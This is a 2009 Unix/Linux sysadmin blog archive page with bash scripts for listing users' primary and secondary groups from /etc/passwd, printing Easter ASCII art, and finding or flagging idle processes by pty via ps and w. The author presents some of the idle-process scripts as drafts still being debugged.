Showing posts with label bash. Show all posts

Tuesday, April 21, 2009

Simple Script To List Groups In Passwd File Output On Linux And Unix

Hey There,

Today's simple, but somewhat useful, little Bash Script is brought to you by "The Human Fund: Money For People" ;) That was shamelessly lifted from "Seinfeld," but I always liked that fake name better than UNICEF ;)

Basically, today's Bash script manipulates the output of a simple "cat" of the /etc/passwd file and interpolates primary and secondary group values, for each user, into their respective output lines. It should run equally well on virtually any Linux or Unix distro, since the passwd fields are in the same order on almost all of them and it doesn't make use of any of the group file fields past the fourth (so extended group files shouldn't affect it).

NOTE: This script goes well with this bash one liner to generate somewhat fancy w output. Haven't had your fill of pap for the day? Check that out ;)

The output you'll get from the script is similar to a simple "cat" of the /etc/passwd file (senility awareness kicking in - I just mentioned that ;), except that the fourth field will be modified. When you run this script, you'll notice that the fourth field of the colon-delimited output contains alphabetic, dash (-) delimited output of the form pg=XXXX-sg=XXXX, rather than just the standard numeric Primary Group ID. The "pg" stands for Primary Group and the "sg" stands for Secondary Group. The Secondary Group, it should be noted, may contain more than one entry (split by commas) if the user belongs to more than one secondary group, and will print "NONE" if the user ID being listed doesn't belong to any groups other than its primary.
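
If you want to see where those values come from, here's roughly what the script does for one user, run by hand (a minimal sketch - the GID 100 and the user name user1 are made-up examples, and the alternation in the second pattern assumes a reasonably current awk like nawk or gawk; the xargs/sed trick at the end is the same one the script itself uses to comma-join the group names):

host # awk -F":" '$3 == 100 {print $1}' /etc/group
host # awk -F":" '$4 ~ /(^|,)user1(,|$)/ {print $1}' /etc/group | xargs echo | sed 's/ /,/g'

The first command maps a numeric primary GID back to its group name; the second lists every group that names user1 in its member field.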

The script's simple to run (because it doesn't have any fancy options ;) and should work fairly quickly (although, like everything, it could probably be more efficient - once I fully develop my insect-like ability to differentiate microseconds, this sort of thing will bother me much more ;)

To run it, just invoke it like so, and you'll get your output (this is from a stripped Solaris box with only one user account and several useless standard accounts removed):

host # ./pwgroups
root:x:0:pg=root-sg=root,other,bin,sys,adm,uucp,mail,tty,lp,nuucp,daemon:Super-User:/:/sbin/sh
daemon:x:1:pg=other-sg=bin,adm,daemon::/:
bin:x:2:pg=bin-sg=bin,sys::/usr/bin:
sys:x:3:pg=sys-sg=sys::/:
adm:x:4:pg=adm-sg=sys,adm,tty,lp:Admin:/var/adm:
lp:x:71:pg=lp-sg=lp:Line Printer Admin:/usr/spool/lp:
uucp:x:5:pg=uucp-sg=uucp:uucp Admin:/usr/lib/uucp:
nuucp:x:9:pg=nuucp-sg=nuucp:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:pg=smmsp-sg=smmsp:SendMail Message Submission Program:/:
listen:x:37:pg=adm-sg=NONE:Network Admin:/usr/net/nls:
webservd:x:80:pg=webservd-sg=webservd:WebServer Reserved UID:/:
postgres:x:90:pg=postgres-sg=postgres:PostgreSQL Reserved UID:/:/usr/bin/pfksh
nobody:x:60001:pg=nobody-sg=nobody:NFS Anonymous Access User:/:
noaccess:x:60002:pg=noaccess-sg=noaccess:No Access User:/:
nobody4:x:65534:pg=nogroup-sg=NONE:SunOS 4.x NFS Anonymous Access User:/:
user1:x:37527:pg=unixteam-sg=guys,folks:Captain Beefmeat:/export/home/user1:/bin/bash


Sure, this script won't save lives (or even change any ;) but I have found use for it from time to time. ...Which stands to reason, I suppose. If I don't think I'm ever going to do something again, I almost never script it out ;)

Hope you find it useful or, at least, mildly amusing :)

Cheers,


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

#!/bin/bash

#
# pwgroups - add alpha primary and secondary group information to /etc/passwd output
#
# 2009 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

export IFS=":"
while read one two three four five six seven
do
    # primary group: map the numeric GID (field 4) back to its group name
    pri=$(grep -w ${four} /etc/group|awk -F":" '{print $1}')
    # secondary groups: every group that lists this user, comma-joined
    sec=$(echo `grep -w ${one} /etc/group|awk -F":" '{print $1}'`|xargs echo|sed 's/ /,/g')
    if [[ ${#sec} -eq 0 ]]
    then
        sec=NONE
    fi
    echo "${one}:${two}:${three}:pg=${pri}-sg=${sec}:${five}:${six}:${seven}"
done </etc/passwd



, Mike







Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Sunday, April 12, 2009

An Easter Story: More ASCII Art For Linux And Unix

Hey There,

It's yet another holiday that we haven't ASCII'ed yet, and we've got another script to print a somewhat-tame Easter story, and picture, to your terminal. Yet again, I've gone back to Joan Stark's ASCII Art Gallery to find a really good picture. And I don't just pick her site because it comes up as Google search result number one for every query I run; there actually is an enormous quantity of high quality ASCII art there. Check it out if you still haven't.

If you're interested in any of our other ASCII art holiday script postings, just check out this page, which is a general search for ASCII Art on our site and you're sure to find most of them there.

If the pictorial representation of the script output below isn't large enough, click on it once to be smacked in the face with the HUMONGOUS version ;)

easter ASCII art

For this installment, I've attached two scripts to the post. The first one is the straight-up bash script. The second is the same script, except with all the spaces padded with "X"'s. If you're having problems maintaining the spaces when you copy/paste the original script, just copy/paste the padded one and then (in vi, or whatever your favorite editor is) substitute "X" with a space character for all occurrences. In vi, that would be an "ex" command like:

[esc]:g/X/s// /g

or

[esc]:%s/X/ /g
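
If you'd rather not do the substitution in an editor at all, a one-liner like the following should give the same result, assuming you've saved the padded version under its name from the header, easter.padded.sh (the art itself contains no literal X's, so a global swap is safe):

host # sed 's/X/ /g' easter.padded.sh > easter.sh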

Enjoy and Happy Easter :)


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License



REGULAR

#!/bin/bash

#
# easter.sh
#
# 2009 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

echo -en "...THE FIRST EASTER BUNNY... by Francine M. O'Connor\n (ASCII Art by joan stark)\n\n __ /^\\\\\n .' \ / :.\ This is the story of a long-eared rabbit\n / \ | :: \ who couldn't learn to do the bunny hop.\n / /. \ / ::: | His ears were floppy, his feet were sloppy,\n | |::. \ / :::'/ he'd hippity hop, then he'd trip and plop.\n | / \::. | / :::'/\n \`--\` \' \`~~~ ':'/\`\n / ( So this little rabbit developed the habit\n / 0 _ 0 \ of staying awake when the sun went down.\n \/ \_/ \/ He'd stay up all night, \n -== '.' | '.' ==- till the morning light, and \n /\ '-^-' /\ practice his hopping just outside of town.\n \ _ _ / \n .-\`-((\o/))-\`-. \n _ / //^\\ \ _ On the first Easter morn, \n.\"o\".( , .:::. , ).\"o\". just before dawn,\n|o o\\\\\ \:::::/ //o o| He was startled by a bright\n \ \\\\\ |:::::| // / and blinding light.\n \ \\\\\__/:::::\__// / And Jesus was there in the \n \ .:.\ \`':::'\` /.:. / shimmering glare,\n \':: |_ _| ::'/ smiling at that funny bunny's plight.\n jgs \`---\` \`\"\"\"\"\"\` \`---\`\n \n Don't worry, little lad, and don't be so sad, .-\"-.\n for humankind will celebrate this special day. .'=^=^='.\n You must bring the word to every beast and bird /=^=^=^=^=\\\\\n that I have risen and am in the world to stay. :^= HAPPY =^;\n |^ EASTER! ^|\n You should've seen that cottontail hop away, :^=^=^=^=^=^:\n feeling mighty proud to be the chosen one. \=^=^=^=^=/\n Though this story is quite old, it can now be retold \`.=^=^=.'\n to make little children smile on Easter morn. \`~~~\`\n"



PADDED
#!/bin/bash

#
# easter.padded.sh
#
# 2009 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

echo -en "...THEXFIRSTXEASTERXBUNNY...XbyXFrancineXM.XO'Connor\nXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX(ASCIIXArtXbyXjoanXstark)\n\nXXXXXX__XXXXXXXXXXXX/^\\\\\nXXXX.'XX\XXXXXXXXXX/X:.\XXXXXXXThisXisXtheXstoryXofXaXlong-earedXrabbit\nXXX/XXXXX\XXXXXXXXX|X::X\XXXXXXwhoXcouldn'tXlearnXtoXdoXtheXbunnyXhop.\nXX/XXX/.XX\XXXXXXX/X:::X|XXXXXXHisXearsXwereXfloppy,XhisXfeetXwereXsloppy,\nX|XXXX|::.X\XXXXX/X:::'/XXXXXXXhe'dXhippityXhop,XthenXhe'dXtripXandXplop.\nX|XXX/X\::.X|XXX/X:::'/\nX\`--\`XXX\'XX\`~~~X':'/\`\nXXXXXXXXX/XXXXXXXXX(XXXXXXXXXXXSoXthisXlittleXrabbitXdevelopedXtheXhabit\nXXXXXXXX/XXX0X_X0XXX\XXXXXXXXXXofXstayingXawakeXwhenXtheXsunXwentXdown.\nXXXXXX\/XXXXX\_/XXXXX\/XXXXXXXXHe'dXstayXupXallXnight,X\nXXXX-==X'.'XXX|XXX'.'X==-XXXXXXXXXtillXtheXmorningXlight,XandX\nXXXXXX/\XXXX'-^-'XXXX/\XXXXXXXXpracticeXhisXhoppingXjustXoutsideXofXtown.\nXXXXXXXX\XXX_XXX_XXX/XXXXXXXXXXXXX\nXXXXXXX.-\`-((\o/))-\`-.XXX\nXX_XXX/XXXXX//^\\XXXXXX\XXX_XXXXOnXtheXfirstXEasterXmorn,X\n.\"o\".(XXXX,X.:::.X,XXXX).\"o\".XXXXXjustXbeforeXdawn,\n|oXXo\\\\\XXXX\:::::/XXXX//oXXo|XXHeXwasXstartledXbyXaXbright\nX\XXXX\\\\\XXX|:::::|XXX//XXXX/XXXXXXandXblindingXlight.\nXX\XXXX\\\\\__/:::::\__//XXXX/XXXXAndXJesusXwasXthereXinXtheX\nXXX\X.:.\XX\`':::'\`XX/.:.X/XXXXXXXXshimmeringXglare,\nXXXX\'::X|_XXXXXXX_|X::'/XXXXXXsmilingXatXthatXfunnyXbunny'sXplight.\nXjgsX\`---\`X\`\"\"\"\"\"\`X\`---\`\nXXXXXXXXXXXXXXXXXXXXXXXXXX\nXXXXDon'tXworry,XlittleXlad,XandXdon'tXbeXsoXsad,XXXXXXXXXXX.-\"-.\nXXXXforXhumankindXwillXcelebrateXthisXspecialXday.XXXXXXXX.'=^=^='.\nXXXXYouXmustXbringXtheXwordXtoXeveryXbeastXandXbirdXXXXXX/=^=^=^=^=\\\\\nXXXXthatXIXhaveXrisenXandXamXinXtheXworldXtoXstay.XXXXXX:^=XHAPPYX=^;\nXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX|^XEASTER!X^|\nXXXXYouXshould'veXseenXthatXcottontailXhopXaway,XXXXXXXX:^=^=^=^=^=^:\nXXXXfeelingXmightyXproudXtoXbeXtheXchosenXone.XXXXXXXXXXX\=^=^=^=^=/\nXXXXThoughXthisXstoryXisXquiteXold,XitXcanXnowXbeXretoldXX\`.=^=^=.'\nXXXXtoXmakeXlittleXchildrenXsmileXonXEasterXmorn.XXXXXXXXXXX\`~~~\`\n"




, Mike







Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Monday, March 30, 2009

Idle Process Time On Linux And Unix: How To Find It Again

Hey There,

In our final installment on "finding a process's idle time on Linux or Unix" (last touched upon in our post on echo debugging), we looked at a whole lot of ways one could go wrong trying to find the idle time of a process on Linux or Unix. This post is a little more upbeat ;)

All of the previous issues with "who -T" have been worked out. Basically, this means that I've gone over it every which way and could find no good reason to use it, as opposed to "w." Of course, in our particular case, we are looking, specifically, for a single process's idle time (as opposed to a user process's idle time, as reported by "who -T"). And, although it's a little bit of a pain (initially), short of programming in C (accessing the pstatus struct on Solaris, to be exact - the name and location may vary from distro to distro of proprietary, or free, Unix and/or Linux), linking the pty information from ps with the "idle time" information from w seems to be the best way to get this information. So far, it's the most efficient way I could find using simple bash scripting.

Attached to today's post is the final "blog" version of this script. It comes with a few notes (possibly of caution) and may need to be modified for your system/OS (There's the first one ;)

The script runs very simply, and you only need to supply it with a PID. You can, optionally, supply a username as a second argument:

host # ./rip 17787

If you just run it with no arguments, you'll get a usage screen, which may or may not help ;)

host # ./rip
Usage: ./rip PID [user]
User defaults to the value
of $LOGNAME if not specified


Please see our previous post on echo debugging this script for more detailed sample output.

I hope you find some good use for this script, and, without further ado, the oft-dreaded notations of explanation ;)

1. This script has been rewritten to be self-contained. Please see the bottom line for any substitute command you may want to use. Actually, making this command a variable might be a good idea (see the sketch after these notes). Just call me "Lazy" ;)

2. You can remove the explicit PATH definition if you like. I put it in there specifically to make sure that the "which ps" variable assignment didn't accidentally grab /usr/ucb/ps on Solaris.

3. You can comment out the SIGNAL variable as well, since plain old kill sends SIGTERM, or 15. The only real reason to set this would be if you wanted to always run kill with a different signal (like SIGKILL, or 9, for example).

4. I changed the minimum idle time to 30 minutes from 45 (in the previous revisions).

5. All variables appearing in this work are fictitious. Any resemblance to real variables, living or dead, is purely coincidental ;)
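
As mentioned in note 1, pulling that bottom-line command into one place near the top of the script would make it easier to swap out. A minimal sketch (the function name get_procs is just my own choice here; the variables are the ones already defined in the script):

get_procs()
{
    $ps -fu $procowner -o procowner,pid,tty,comm | $grep "$prog" | $grep -v grep
}

and then the last line of the script becomes:

done <<< "`get_procs`"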

Cheers,


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

#!/bin/bash

#
# rip - Kill any processes that we know have been idle for more than 30 minutes
#
# 2009 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

PATH="/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin"
procowner="rftprocowner"
prog="\./rft"
sed=`which sed`
awk=`which awk`
ps=`which ps`
grep=`which grep`
kill=`which kill`
signal="-15"

while read a b c d
do
    pid=$b
    # make sure the pid field we read is actually numeric
    pid_not_var=$(echo $pid | $grep "[A-z]")

    if [[ ! -z $pid_not_var ]]
    then
        echo "pid $pid contains non-numeric characters!"
        continue
    fi

    pid="$b"
    pid_pty="$c"

    if [[ -z "$pid_pty" ]]
    then
        echo "pid $pid is either non-existent, not owned by \"$procowner\" or not attached to a p/tty!"
        continue
    elif [[ "$pid_pty" = "?" || "$pid_pty" = "console" ]]
    then
        echo "pid $pid is not attached to a pty!" # kill OR LEAVE IT?
    else
        # strip everything up to and including the "/" so we can match w's tty column
        pty_num=$(echo "$pid_pty"|$sed 's/^[^\/]*\///')
    fi

    # idle column from w for this pty; a missing column (NF == 3) means "not idle at all"
    proc_time=$(w -sh $procowner|grep $pty_num|grep -v grep|$awk '{if ( $2 == '"$pty_num"' && NF == 4 ) print $3;else if ( $2 == '"$pty_num"' && NF == 3) print "0"}')

    proc_is_num=$(echo $proc_time | $grep "[A-z]")
    if [[ ! -z $proc_is_num ]]
    then
        unset proc_time
    fi

    ext_proc_time=$(echo $proc_is_num | $grep "[A-z]")

    if [[ ! -z "$ext_proc_time" && -z "$proc_time" ]]
    then
        echo "killing $pid - $d Up Over 24 Hours: $ext_proc_time $proc_time"
        ### $kill $signal $pid
    elif [[ "$proc_time" = "0" ]]
    then
        :
    else
        proc_idle_time=$(echo $proc_time|$grep -v "[:]")
        if [[ -z $proc_idle_time || $proc_idle_time -gt 30 ]]
        then
            echo "killing $pid - $d Up More Than 30 Minutes: $ext_proc_time $proc_time $proc_idle_time"
            ### $kill $signal $pid
        fi
    fi
done <<< "`$ps -fu $procowner -o procowner,pid,tty,comm|$grep "$prog"|$grep -v grep`"


, Mike







Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Thursday, March 26, 2009

Simple, But Effective. Echo Debugging On Linux And Unix

Hey there,

I took some time and did some simple "echo debugging" and found that the warning I issued about yesterday's script to find a process's idle time was completely backward. Fortunately, it turns out that my mistaken judgement meant that I had a lot less to worry about, in terms of damage control, from the flaw I perceived in my script (I'm not saying there aren't others, of course ;)

It turns out that the problem was not that the script would sometimes consider an active process, that didn't have an idle column value in the "w -s" output, to be idle and worth terminating. The actual problem was that it would consider processes that had been up for more than a day to be active and not worth terminating. This was a much better situation. At least I wouldn't be killing off active processes!

A sample of just using the DEBUG statements I put in yesterday's script pointed out the error very obviously, like so:

DEBUG::::: PIDTTY 6892 pts/119
DEBUG::::: W user1 119 2days ./program
DEBUG::::: LONGTIME TIME
PID 6892 is OK - Not Idle At All - Remove this message!
------------------------
DEBUG::::: PIDTTY 581 pts/232
DEBUG::::: W user1 232 2days ./program
DEBUG::::: LONGTIME TIME
PID 581 is OK - Not Idle At All - Remove this message!
-----------------------------------


And, yes, I felt like a complete moron when I finally took a second to actually look at the output ;) It's amazing what a few simple echo statements in a script can tell you about what problems it has :)
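
If you find yourself sprinkling DEBUG lines like those through a script often, it can help to wrap them so they can all be switched on and off in one place. A minimal sketch (the DEBUG variable and the debug function are just my own convention, not something from the script below):

DEBUG=${DEBUG:-0}
debug()
{
    [ "$DEBUG" -eq 1 ] && echo "DEBUG::::: $*" >&2
}

debug "PIDTTY $PIDTTY"

Run the script normally and the lines stay quiet; run it as "DEBUG=1 ./rip 17787" and they all show up on stderr.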

From that point, I found several other issues and worked on them accordingly:

1. ISSUE WITH IDLE ALPHA DAYS NOTATION = FIX BY CHECKING FOR NON-NUMERIC TYPES

2. ISSUE WITH NO-IDLE MISSING COLUMN = FIX BY SETTING EMPTY VALUE TO NULL PADDED

3. ISSUE WITH MISSING COLUMN ERROR OUTPUT = FIX BY CHECKING COLUMN COUNT IN TIME

4. MUCH BETTER - "NOT IDLE AT ALL" EXCEPTION NEVER CAUGHT - UNNECESSARY NOW - REMOVED

5. REWORKED TIME HANDLING AND SET TO AMBIGUOUS ALPHA MATCH


Pardon my hysterical notes ;) Most of my problem stemmed from the fact that I switched from full-fledged "w" to "w -s" and made some mistakes in updating the relevant columns that I needed to assign to variables.

I should note that I also considered using "who -T" to get around the one time-stealer in this script. Although it did bring the script down to under a second (processing approximately 100 records), "who" only reports on the "user process." This is a huge consideration, since the "user process" can be (and usually is) the parent process of the process you want to check the idle time on. I ultimately decided to stick with "w," since using "who" would mean I'd have to check the parent process, cross-reference that with the grep output associated with the pty and then end up back at "w" again to get the process's idle time. A lot of extra work for a lot of extra uncertainty. I didn't want to end up in a situation where the "user process" was idle because the user kicked off a script that ran for 6 hours, and then terminate the user's main process (which would kill the kids) based on the idle time of the user's session. Sometimes, lack of precision like that can cause you headaches you never imagined you could have ;)

As you can see below, the updates weren't all that impressive, but I did get the execution time down to 30 seconds from 2 minutes. The only way I could get it lower (that I've figured out so far ;) was to compromise the integrity of the script and remove the one awk statement that was holding it back. Notice the last step I took, just to see what would happen, which proved the awk if/else conditional in the script was responsible for the majority of the execution time:

TRIMMED CODE - REMOVED DEBUG AND UNNECESSARY ECHO STATEMENTS - USING BASH TEST AND OPERATORS
OLD SCRIPT EXECUTION TIME FOR 178 PROCS = 1m27.430s
NEW SCRIPT EXECUTION TIME FOR 179 PROCS = 0m56.517s
NEW SCRIPT EXECUTION TIME FOR 110 PROCS = 0m48.940s
SELF-CONTAINED SCRIPT EXECUTION TIME FOR 111 PROCS = 0m51.048s
ADDED TTY TO PS SCRIPT EXECUTION TIME FOR 101 PROCS = 0m29.703s
REMOVING AWK TTY STATEMENT SCRIPT EXECUTION TIME FOR 100 PROCS = 0m29.991s
ADDED ?, console and "continue" SCRIPT EXECUTION TIME FOR 102 PROCS = 0m33.018s
REMOVED W HEADING (REM SED) AND EXPLICIT USER SCRIPT EXECUTION TIME FOR 101 PROCS = 0m33.382s
TEST - HARDCODED UPTIME AND REMOVED AWK STATEMENT - SCRIPT EXECUTION TIME FOR 170 PROCS = 0m8.512s!!!!!!!!!!!


I'm going to work on it some more, because I believe it can be improved tremendously, but - to satisfy any curiosity, here's some of the mid-work that fixed that issue and made the bash script report correctly. I'll post the one with the fixes noted above (and more, I'm sure ;) once I've thoroughly tested them and removed a lot of the redundancy in this script. Redundancy really gets under my skin. I mean it; redundancy really irritates me. Plus, I don't much care for redundancy ;)

Cheers,


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

#!/bin/bash

#
# rip - Kill any processes that we know have been idle for more than 45 minutes - v2-alpha
#
# 2009 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

if [[ $# -lt 1 ]]
then
echo "Usage: $0 PID [user]"
echo "User defaults to the value"
echo "of \$LOGNAME if not specified"
exit 1
fi

PID=$1
ISITAPID=$(echo $PID | grep [A-z])

if [[ ! -z $ISITAPID ]]
then
echo "PID $1 contains non-numeric characters!"
echo "-----------------------------------"
exit 2
fi

PID="$1"
USER=${2:-$LOGNAME}

PIDTTY=$(/usr/bin/ps -fu $USER -o pid,tty |/usr/bin/grep -w $PID|/usr/bin/grep -v grep)

echo DEBUG::::: PIDTTY $PIDTTY

if [[ -z "$PIDTTY" ]]
then
echo "PID $PID is either non-existent, not owned by \"$USER\" or not attached to a p/tty!"
echo "-----------------------------------"
exit 3
else
TTYNUMBER=$(echo "$PIDTTY"|/usr/bin/sed '/TT/d'|/usr/bin/awk -F"/" '{print $2}')
fi

if [[ -z "$TTYNUMBER" ]]
then
echo "PID $PID is not attached to a p/tty!"
echo "KILL OR NOT-----------------------------------"
exit 4
fi

echo DEBUG::::: W $(w -s|/usr/bin/sed 1d|/usr/bin//awk '{if ( $2 == '"$TTYNUMBER"' ) print $0}')

TIME=$(w -s|/usr/bin/sed 1d|/usr/bin/awk '{if ( $2 == '"$TTYNUMBER"' && NF == 4 ) print $3;else if ( $2 == '"$TTYNUMBER"' && NF == 3) print "0"}')
#TIME=$(w -s|/usr/bin/sed 1d|/usr/bin/awk '{if ( $2 == '"$TTYNUMBER"' ) print $3}')
#WCOLUMNS=$(w -s|/usr/bin/sed 1d|/usr/bin/awk '{if ( NF == 4 ) print "4";else print "3"}')

ISITANUMBER=$(echo $TIME | grep [A-z])
if [[ ! -z $ISITANUMBER ]]
then
unset TIME
fi

LONGTIME=$(echo $ISITANUMBER | grep [A-z])

echo DEBUG::::: LONGTIME $LONGTIME TIME $TIME

if [[ ! -z "$LONGTIME" && -z "$TIME" ]]
then
echo "PID $PID is ancient - Idle for $LONGTIME... Killing $PID"
# KILLKILLKILL
elif [[ "$TIME" = "0" ]]
then
echo "PID $PID is OK - Not Idle At All - Remove this message!"
else
TIMEIDLE=$(echo $TIME|grep -v "[:]")
echo DEBUG::::: TIME $TIME
if [[ -z $TIMEIDLE ]]
then
echo "PID $PID has been idle way too long - $LONGTIME $TIME so far... Killing $PID"
# KILLKILLKILL
elif [[ $TIMEIDLE -gt 45 ]]
then
echo "PID $PID has been idle too long - $TIMEIDLE minutes so far... Killing $PID"
# KILLKILLKILL
else
echo "PID $PID is OK - Only idle for $TIME minute(s) - Remove this message!"
fi
fi
echo "-----------------------------------"


, Mike







Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Wednesday, March 25, 2009

Finding A Process's Idle Time On Linux And Unix

Hey There,

Hopefully yesterday's rant on the simplicity of complexity wasn't too much of a bitter pill. If it was, here's hoping you didn't swallow it ;)

Today, I finally found some time to make a little headway on this project (which should be a lot simpler than it is). Basically, what I'm looking to do is create a way to track a specific process's idle time at any given point in time on any given Linux or Unix system. As I mentioned yesterday, there are C structures in Solaris' /proc/PID/status data files (for one example), but that's just another thing that ended up frustrating me more. As I noted, parts of the OS that are included should be available for use. The structure is used by the OS, in some shape or fashion, to determine idle times (as we'll see below), but no specific "tool" exists to do what I wanted. Of course, this is limited "to my knowledge." If anyone out there knows of a standard program or command that's managed to elude me, please feel free to email me and tell me all about it. I promise not to get offended if you feel the need to belittle me for not having the common sense to look for it where it was at in the first place ;)

Attached to today's post is a rough-draft bash script that attempts to grab a process's idle time. It won't work in all instances, although I've tried to capture as many of those instances as possible. The one big gotcha in this whole mess is that you can't take the output of ps and directly retrieve the idle time for a process from the listing, even if you do your own formatting (I wrote this on Solaris 10 and looked at SUSE Linux 9, but found no love :) Instead, I found that I needed to run ps, extract the pty associated with the process from that (if it existed - which is an exception the script catches) and then use either who or w to retrieve the idle time associated with the pty.
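
To make that chain a little more concrete, here it is by hand, the way it looks on the Solaris box this was written on (a rough sketch - 17787 is a made-up PID and pts/3 a made-up pty; on Linux the "w" tty column usually shows the full "pts/3" rather than the bare number, so adjust the match accordingly):

host # ps -o tty= -p 17787
pts/3
host # w -s | awk '$2 == "3"'

The first command tells you which pty the process is attached to; the second pulls that pty's line out of "w," which is where the idle time lives.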

See what I mean? Shouldn't it be a little bit less of a hassle than that?

Okay. I'll admit, if it was, I wouldn't be having half the fun I'm having now trying to script it all out for myself ;) So far, what I've put together works fairly well, although I'm not 100% certain that it's bullet-proof so I would recommend that you leave the "business end" of the code commented out (The stuff that performs unforgivable actions, like killing ;). I have a hard time reproducing it, but I can swear that this code will (every once in a good while) determine that a process that hasn't been idle at all (which removes a column from the "w -s" output) has been idle too long. I'm still working on that part and welcome any suggestions regarding the script, how to make it better, why I'm doing everything the wrong (and/or hard) way when I don't need to and any other constructive criticism :)

The script runs very simply, and you only need to supply it with a PID. You can, optionally, supply a username as a second argument:

host # ./rip 17787

If you just run it with no arguments, you'll get a usage screen, which may or may not help ;)

host # ./rip
Usage: ./rip PID [user]
User defaults to the value
of $LOGNAME if not specified


and the following is a sample of the output you might get on a specific run. Here, I've written a command line while loop from a pipe to barbarically hammer out multiple instances at a time ;)

host # time ps -ef|grep "[b]ash"|awk '{print $2}'|while read x;do ./rip $x;done
PID 2664 is not attached to a p/tty!
-----------------------------------
PID 10700 is either non-existent, not owned by "root" or not attached to a p/tty!
-----------------------------------
PID 10855 is OK - Not Idle At All - Remove this message!
-----------------------------------
PID 23217 is OK - Not Idle At All - Remove this message!
-----------------------------------
PID 14730 is either non-existent, not owned by "root" or not attached to a p/tty!
-----------------------------------


Here's another example. This time you'll see what you get if you try to run the script specifying a user other than the user that owns the processes or, in this case, a completely bogus user. This "test" in the script really isn't necessary and I only included it as a feeble attempt at damage control. Feel free to remove it if you like:

host # time ps -ef|grep "[b]ash"|awk '{print $2}'|while read x;do ./rip $x joeUser;done
ps: unknown user joeUser
PID 2664 is either non-existent, not owned by "joeUser" or not attached to a p/tty!
-----------------------------------
ps: unknown user joeUser
PID 23633 is either non-existent, not owned by "joeUser" or not attached to a p/tty!
-----------------------------------
ps: unknown user joeUser
PID 10700 is either non-existent, not owned by "joeUser" or not attached to a p/tty!
-----------------------------------
ps: unknown user joeUser
PID 10855 is either non-existent, not owned by "joeUser" or not attached to a p/tty!
-----------------------------------
ps: unknown user joeUser
PID 14730 is either non-existent, not owned by "joeUser" or not attached to a p/tty!
-----------------------------------


I hope you find some good use for this script!

NOTE: Please keep in mind the caveat noted above regarding the sometimes-false-positive I believe this script returns under certain circumstances when it decides a non-idle process (with nothing displayed in the idle column from "w -s" output) has been idle too long! It may never happen again and I may have been seeing spots. Just want to keep you in a "safe" mindset, just in case I'm not completely insane ;)

Cheers,


Creative Commons License


This work is licensed under a
Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License

#!/bin/bash

#
# rip - Kill any processes that we know have been idle for more than 45 minutes
#
# 2009 - Mike Golvach - eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

if [ $# -lt 1 ]
then
echo "Usage: $0 PID [user]"
echo "User defaults to the value"
echo "of \$LOGNAME if not specified"
exit 1
fi

PID=$1
ISITAPID=$(echo $PID | grep [A-z])

if [ ! -z $ISITAPID ]
then
echo "PID $1 contains non-numeric characters!"
echo "-----------------------------------"
exit 2
fi

PID="$1"
USER=${2:-$LOGNAME}

PIDTTY=$(/usr/bin/ps -fu $USER -o pid,tty |/usr/bin/grep -w $PID|/usr/bin/grep -v grep)

#echo DEBUG::::: PIDTTY $PIDTTY

if [ -z "$PIDTTY" ]
then
echo "PID $PID is either non-existent, not owned by \"$USER\" or not attached to a p/tty!"
echo "-----------------------------------"
exit 3
else
TTYNUMBER=$(echo "$PIDTTY"|/usr/bin/sed '/TT/d'|/usr/bin/awk -F"/" '{print $2}')
fi

if [ -z "$TTYNUMBER" ]
then
echo "PID $PID is not attached to a p/tty!"
echo "-----------------------------------"
exit 4
fi

#echo DEBUG::::: W $(w -s|/usr/bin/sed 1d|/usr/bin//awk '{if ( $2 == '"$TTYNUMBER"' ) print $0}')

TIME=$(w -s|/usr/bin/sed 1d|/usr/bin/awk '{if ( $2 == '"$TTYNUMBER"' ) print $3}')

ISITANUMBER=$(echo $TIME | grep [A-z])
if [ ! -z $ISITANUMBER ]
then
unset TIME
fi

LONGTIME=$(echo $TIME | grep [A-z])

#echo DEBUG::::: LONGTIME $LONGTIME TIME $TIME

if [ -z "$LONGTIME" -a -z "$TIME" ]
then
echo "PID $PID is OK - Not Idle At All $TIME - Remove this message!"
elif [ ! -z $LONGTIME ]
then
echo "PID $PID is ancient - Idle for $TIME... Killing $PID"
# DO_WHAT_YOU_HAVE_TO_DO_TO_THE_PID_HERE
else
TIMEIDLE=$(echo $TIME|grep -v "[:]")
# echo DEBUG::::: TIME $TIME
if [ -z $TIMEIDLE ]
then
echo "PID $PID has been idle way too long - $LONGTIME $TIME so far... Killing $PID"
# DO_WHAT_YOU_HAVE_TO_DO_TO_THE_PID_HERE
elif [ $TIMEIDLE -gt 45 ]
then
echo "PID $PID has been idle too long - $TIMEIDLE minutes so far... Killing $PID"
# DO_WHAT_YOU_HAVE_TO_DO_TO_THE_PID_HERE
else
echo "PID $PID is OK - Only idle for $TIME minute(s) - Remove this message!"
fi
fi
echo "-----------------------------------"


, Mike







Please note that this blog accepts comments via email only. See our Mission And Policy Statement for further details.

Wednesday, February 18, 2009

Simple Unix And Linux Shell Tricks To Save You A Few Gray Hairs

What it is?

